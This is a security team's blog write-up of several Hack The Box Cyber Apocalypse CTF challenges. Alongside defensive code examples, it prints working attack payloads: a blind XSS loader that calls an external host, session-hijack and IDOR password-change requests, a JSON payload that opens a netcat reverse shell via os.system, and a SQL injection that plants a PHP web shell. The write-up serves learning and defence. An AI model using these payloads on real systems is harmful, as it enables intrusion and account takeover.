Hack The Box Cyber Apocalypse

Posted May 24, 2022 by Austin Lee ‐ 8 min read

LifeOmic's security team competes in these challenges casually, with a focus on learning and improvement.

Our team started off picking away at some of the low-hanging fruit, then began to dig into a few interesting challenges that are highlighted below.

kryptos-support

The challenge description reads “The secret vault used by the Longhir’s planet council, Kryptos, contains some very sensitive state secrets that Virgil and Ramona are after to prove the injustice performed by the commission. Ulysses performed an initial recon at their request and found a support portal for the vault. Can you take a look if you can infiltrate this system?”

After launching the docker image and accessing the instance we land on a page that shows a text window where a user can send a support message. We also discovered a login page located at /login.


Basic SQL injection payloads on the login page, like ' OR 1=1 --, did not yield any fruit. Next we moved on to some enumeration, but after running tools like SQLmap, OWASP Zap, and dirbuster we still came up empty-handed and without a clear direction to head next. From some further enumeration we discovered that if you add Cookie: session=<base64 encoded {"username":"admin"}>, the 302 redirect will change to /logout instead of just /.

Since we had seemingly run out of options, we opted to try some blind XSS, submitting a payload similar to <script>$.getScript("//lifeomic.xss.ht")</script>, and after a little while we got a hit! The XSS ran and provided us with the session cookie of another user.


We now had our next clue and started working towards session hijacking. We found that the following request allows us to hijack the session as user moderator and view submitted support tickets:

curl --cookie 'session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im1vZGVyYXRvciIsInVpZCI6MTAwLCJpYXQiOjE2NTI3NjAxODR9.2_ka4Bt4Tt05OBBLJDqdJ5tPxtsSWDp1pKSkVHlj6og' 'http://188.166.172.138:32079/tickets'

Now that we were in the system we seemed to have hit another dead end: there wasn’t anything of value in the tickets, so there had to be another step remaining. After a little more searching we discovered the ability to update passwords and noted that the UID for the moderator user was 100.


We attempted to update another user’s password, and on an educated guess that UID 1 might be admin, that was our first target. We crafted this request and successfully updated the admin’s password:

curl -H 'Content-Type: application/json' -d '{"password":"foo", "uid":"1"}' --cookie 'session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im1vZGVyYXRvciIsInVpZCI6MTAwLCJpYXQiOjE2NTI3NjAxODR9.2_ka4Bt4Tt05OBBLJDqdJ5tPxtsSWDp1pKSkVHlj6og' 'http://188.166.172.138:32079/api/users/update'
{"message":"Password for admin changed successfully!"}

Returning to the login page that was discovered at the start of the challenge, we were then able to log in as admin and find the flag. +300 points for the team!
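The password change above worked because the update endpoint acted on the uid in the request body rather than the uid in the session. The following is an added example, not the challenge's code: the in-memory user store, function names, status codes and password policy are assumptions, and it places that behaviour beside a handler that takes the target account from the session only.

```python
import hashlib
import os

def hash_password(password: str) -> bytes:
    # Salted PBKDF2 so the store never holds plaintext (parameters are illustrative).
    salt = os.urandom(16)
    return salt + hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def new_store() -> dict:
    # Constructed user table: uid 1 is admin and uid 100 is moderator, as in the write-up.
    return {1: {"username": "admin", "pw": hash_password("admin-secret")},
            100: {"username": "moderator", "pw": hash_password("mod-secret")}}

def update_vulnerable(store: dict, session: dict, body: dict):
    # Flaw: the account to modify comes from caller-controlled JSON.
    uid = int(body["uid"])
    store[uid]["pw"] = hash_password(body["password"])
    return 200, f"Password for {store[uid]['username']} changed successfully!"

def update_hardened(store: dict, session: dict, body: dict):
    # The target is always the authenticated user from the verified session.
    target = session["uid"]
    requested = body.get("uid", target)
    # Compare as strings so "1" and 1 are treated alike; any mismatch is refused.
    if str(requested) != str(target):
        return 403, "Forbidden: cannot change another user's password"
    password = body.get("password")
    # Illustrative policy: require a string of at least 12 characters.
    if not isinstance(password, str) or len(password) < 12:
        return 400, "Password must be a string of at least 12 characters"
    store[target]["pw"] = hash_password(password)
    return 200, f"Password for {store[target]['username']} changed successfully!"
```
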


android-in-the-middle

The description for this challenge reads “Years have passed since Miyuki rescued you from the graveyard. When Virgil tells you that he needs your help with something he found there, desperate thoughts about your father and the disabilities you developed due to the disposal process come to mind. The device looks like an advanced GPS with AI capabilities. Riddled with questions about the past, you are pessimistic that you could be of any value. After hours of fiddling and observing the power traces of this strange device, you and Virgil manage to connect to the debugging interface and write an interpreter to control the signals. The protocol looks familiar to you. Your father always talked about implementing this scheme in devices for security reasons. Could it have been him?”

This challenge is playing with encryption. While looking at the source code provided we can see that the server will generate a public key for itself and tell us what it is. Next it will prompt us to submit our own public key, and then we are expected to submit an encrypted string to get the flag back.

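Our team wrote the following Python code to solve the challenge. It submits 0 as our public key, which makes the shared secret 0 no matter what private key the server holds, so we can derive the AES key ourselves: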

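import binascii
import hashlib
import random

from Crypto.Cipher import AES  # pycryptodome
from Crypto.Util.number import long_to_bytes
from source import g, p  # DH parameters from the challenge's provided source file

# An honest DH key pair; not needed once M = 0 is submitted.
c = random.randrange(2, p - 1)
C = pow(g, c, p)

# The "public key" we send to the server.
M = 0

# 0 raised to any positive exponent is 0, so this matches the server's result.
shared_secret = pow(M, c, p)

# Derive the AES key from the shared secret.
key = hashlib.md5(long_to_bytes(shared_secret)).digest()

# Encrypt the initialization sequence the server expects.
cipher = AES.new(key, AES.MODE_ECB)
data = b"Initialization Sequence - Code 0"
message = cipher.encrypt(data)

# Sanity check: decrypting must return the original plaintext.
cipher = AES.new(key, AES.MODE_ECB)
message2 = cipher.decrypt(message)

print(binascii.hexlify(message))
print(message2)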

Running it returns our flag:

➜  ~ nc 46.101.27.51 30850
DEBUG MSG - Generating The Global DH Parameters
DEBUG MSG - g = 2, p = 10177459997049772558637057109490700048394574760284564283959324525695097805837401714582821820424475480057537817583807249627119267268524840254542683041588432363128111683358536204391767254517057859973149680238170237977230020947732558089671785239121778309357814575486749623687357688511361367822815452806637006568922401890961240475060822815400430220536180181951862931844638638933951683988349468373510128406899660648258602475728913837826845743111489145006566908004165703542907243208106044538037004824530893555918497937074663828069774495573109072469750423175863678445547058247156187317168731446722852098571735569138516533993
DEBUG MSG - Calculation Complete

DEBUG MSG - Generating The Public Key of CPU...
DEBUG MSG - Calculation Complete
DEBUG MSG - Public Key is: ???

Enter The Public Key of The Memory: 0

DEBUG MSG - The CPU Calculates The Shared Secret
DEBUG MSG - Calculation Complete

Enter The Encrypted Initialization Sequence: 1af761314a07bf79f31aeb53bc9e1335e1749e1142b326d82a3c29ac37a042bf

DEBUG MSG - Reseting The Protocol With The New Shared Key
DEBUG MSG - HTB{7h15_p2070c0l_15_pr0tec73d_8y_D@nb3er_c0pyr1gh7_1aws}%
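The session above succeeds because the server accepts 0 as a Diffie-Hellman public value. The following is an added example, not the challenge's source: it shows the peer-value check that closes this hole, using a constructed demo modulus and hypothetical function names rather than the challenge's g and p.

```python
import hashlib
import secrets

# Constructed demo parameters (a Mersenne prime), not the challenge's g and p.
P = 2**127 - 1
G = 3

def int_to_bytes(n: int) -> bytes:
    # Big-endian encoding; 0 encodes as a single zero byte.
    return n.to_bytes(max(1, (n.bit_length() + 7) // 8), "big")

def derive_key(shared_secret: int) -> bytes:
    # MD5 of the shared secret, mirroring the solve script's key derivation.
    return hashlib.md5(int_to_bytes(shared_secret)).digest()

def keypair(p: int = P, g: int = G):
    priv = secrets.randbelow(p - 3) + 2  # 2 <= priv <= p - 2
    return priv, pow(g, priv, p)

def shared_unchecked(peer_public: int, priv: int, p: int = P) -> int:
    # What a server computes when it uses the peer's value as-is.
    return pow(peer_public, priv, p)

def shared_checked(peer_public: int, priv: int, p: int = P) -> int:
    # Reject values outside [2, p-2]: 0 and multiples of p give 0,
    # 1 gives 1, and p-1 gives 1 or p-1, whatever the private key is.
    if not isinstance(peer_public, int) or not 2 <= peer_public <= p - 2:
        raise ValueError("invalid Diffie-Hellman public value")
    secret = pow(peer_public, priv, p)
    if secret in (0, 1, p - 1):
        raise ValueError("degenerate shared secret")
    return secret

def forced_secrets(peer_public: int, trials: int = 50, p: int = P) -> set:
    # Shared secrets seen across many fresh private keys for one peer value.
    return {shared_unchecked(peer_public, keypair(p)[0], p) for _ in range(trials)}
```
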

amidst-us

The description for this challenge reads “The AmidstUs tribe is a notorious group of sleeper agents for hire. We have plausible reasons to believe they are working with Draeger, so we have to take action to uncover their identities. Ulysses and bonnie have infiltrated their HQ and came across this mysterious portal on one of the unlocked computers. Can you hack into it despite the low visibility and get them access?”

After spinning up this challenge it takes us to a dark webpage that lights up as we move the mouse around the screen.


We found out that clicking on the UFO allows an image upload. While poking at the image functionality we found that there aren’t very good checks on what is being uploaded; by intercepting the request and sending the following payload we were able to obtain a reverse shell.

POST /api/alphafy HTTP/1.1
Host: 123.123.123.123:32225
Content-Length: 188
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://123.123.123.123:32225
Referer: http://123.123.123.123:32225/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"image":"iVBORw0KGgoAAAANSUhEUgAAAAEAAAABAQMAAAAl21bKAAAAA1BMVEUAAACnej3aAAAAAXRSTlMAQObYZgAAAApJREFUCNdjYAAAAAIAAeIhvDMAAAAASUVORK5CYII=","background":["exec(\"__import__('os').system('nc 123.123.123.123 5550 -e /bin/sh')\")",255,255]}

Exploring the file system led us to the flag: HTB{i_slept_my_way_to_rce}.
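The request above carries a string in a slot of the background array that otherwise holds numbers. The following is an added example of the missing checks, not the challenge's code: the function name, the PNG-only rule and the size limit are assumptions. It validates the body before any image processing sees it.

```python
import base64
import binascii

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
MAX_IMAGE_BYTES = 2 * 1024 * 1024  # assumed upload limit

def validate_alphafy_request(body):
    """Return (image_bytes, (r, g, b)) or raise ValueError."""
    if not isinstance(body, dict) or set(body) != {"image", "background"}:
        raise ValueError("unexpected fields")
    image_b64, background = body["image"], body["background"]
    if not isinstance(image_b64, str):
        raise ValueError("image must be a base64 string")
    try:
        image = base64.b64decode(image_b64, validate=True)
    except (binascii.Error, ValueError) as exc:
        raise ValueError("image is not valid base64") from exc
    if len(image) > MAX_IMAGE_BYTES or not image.startswith(PNG_MAGIC):
        raise ValueError("image must be a PNG within the size limit")
    if not isinstance(background, list) or len(background) != 3:
        raise ValueError("background must be a list of three channels")
    for channel in background:
        # bool is a subclass of int in Python, so exclude it explicitly;
        # a string in a channel slot, as in the request above, fails here too.
        if isinstance(channel, bool) or not isinstance(channel, int):
            raise ValueError("background channels must be integers")
        if not 0 <= channel <= 255:
            raise ValueError("background channels must be in 0..255")
    return image, tuple(background)
```
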

through-fire-n-gates

This is a hardware challenge and it provides us with a circuit file. After spending some time on it we were able to get all of the circuits in the green by adding buttons, but still no indication of a flag.


Call it intuition or a lucky guess, but our team then noticed that there are groups of 1/0 nodes circled together, and there just happen to be eight nodes in each circle. Perhaps they represent ASCII characters? We started working on translating the gates from binary to ASCII and got this string as the output: UO...ê~e.M_7h3_g4t3}. The end looks like a flag, so we figured that was the right path. After a little bit of troubleshooting we were able to fix the circuits and produce the whole flag to solve the challenge: HTB{L0st_1n_7h3_g4t3}

the-intergalactic-post

This challenge lands us on a webpage where we can submit an email to sign up for the intergalactic post newsletter. Given the name of the challenge and the basic webpage, we suspected another challenge vulnerable to injection, but after running some basic payloads we didn’t see any signs of vulnerability.


We are also provided the source code, so let’s take a look at that and see if we can identify the attack vector. It’s a PHP app with a SQLite backend, and appears to be vulnerable to SQL injection through this INSERT statement via the X-Forwarded-For header.


We injected a basic payload, ',''); SELECT 1; --, into the header, sent it off, and got a successful response back. Great! Now we know SQL is likely our attack vector, but the flag is located at /flag.txt on disk and not in the database, so how do we get to it from our injection? Doing some research, we discovered that you can use .import to import a file into the database. We created a new table and tried to import the flag but were unsuccessful:

PHP message: PHP Warning: SQLite3::exec(): near ".": syntax error in /www/Database.php on line 36" while reading response header from upstream

It seems like .import is not available in exec, so we would need to find another way.

Our team did some more noodling and then crafted this payload that can access the flag without having to use any . commands. We are able to attach a .php file as a database, create a table in that new database, and then insert a row containing PHP code that cats the flag when the file is requested.

ATTACH DATABASE '/www/a.php' AS i;
CREATE TABLE i.t (c TEXT);
INSERT INTO i.t (c) VALUES ('<?php system("cat /flag*"); ?>');

These commands ran successfully through our injection header, so now all we needed to do was navigate to our new file at /a.php in the browser and we got the flag.
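The injection above depends on two things: the X-Forwarded-For value is concatenated into the INSERT, and the connection is free to run ATTACH. The following is an added example, not the challenge's PHP source: it uses Python's sqlite3 module, a hypothetical subscribers table and a constructed header value to show the string-built insert beside a parameterized one, plus an authorizer that refuses ATTACH.

```python
import sqlite3

def open_db():
    conn = sqlite3.connect(":memory:")
    # Hypothetical schema; the challenge's real table is only shown in a screenshot.
    conn.execute("CREATE TABLE subscribers (ip_address TEXT, email TEXT)")
    return conn

def subscribe_unsafe(conn, ip, email):
    # String-built SQL passed to a multi-statement API, as with SQLite3::exec in PHP.
    conn.executescript(
        f"INSERT INTO subscribers (ip_address, email) VALUES ('{ip}', '{email}')")

def subscribe_safe(conn, ip, email):
    # Bound parameters: the header is stored as data and never parsed as SQL.
    conn.execute(
        "INSERT INTO subscribers (ip_address, email) VALUES (?, ?)", (ip, email))
    conn.commit()

def deny_attach(action, arg1, arg2, db_name, source):
    # Defence in depth: refuse ATTACH even if an injection point is missed.
    if action == sqlite3.SQLITE_ATTACH:
        return sqlite3.SQLITE_DENY
    return sqlite3.SQLITE_OK

def attached(conn):
    return [row[1] for row in conn.execute("PRAGMA database_list")]

def run_demo():
    # Constructed header value; it attaches an in-memory database, not a file.
    header = "203.0.113.7', ''); ATTACH DATABASE ':memory:' AS i; --"
    out = {}
    conn = open_db()
    subscribe_unsafe(conn, header, "a@example.com")
    out["unsafe_attached"] = "i" in attached(conn)
    conn = open_db()
    subscribe_safe(conn, header, "a@example.com")
    out["safe_attached"] = "i" in attached(conn)
    stored = conn.execute("SELECT ip_address FROM subscribers").fetchone()[0]
    out["safe_stored_literal"] = stored == header
    conn = open_db()
    conn.set_authorizer(deny_attach)
    try:
        subscribe_unsafe(conn, header, "a@example.com")
        out["authorizer_blocked"] = False
    except sqlite3.Error:
        out["authorizer_blocked"] = True
    out["authorizer_attached"] = "i" in attached(conn)
    return out
```
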


By the end of the competition our team was able to complete 12 challenges, which put us in the top 5% ranking out of around 7,000 teams that competed. While we didn’t set out to win or finish in a high ranking, we were pleased to have done so well. We learnt some new tricks, had a ton of fun, and look forward to competing in future CTFs.
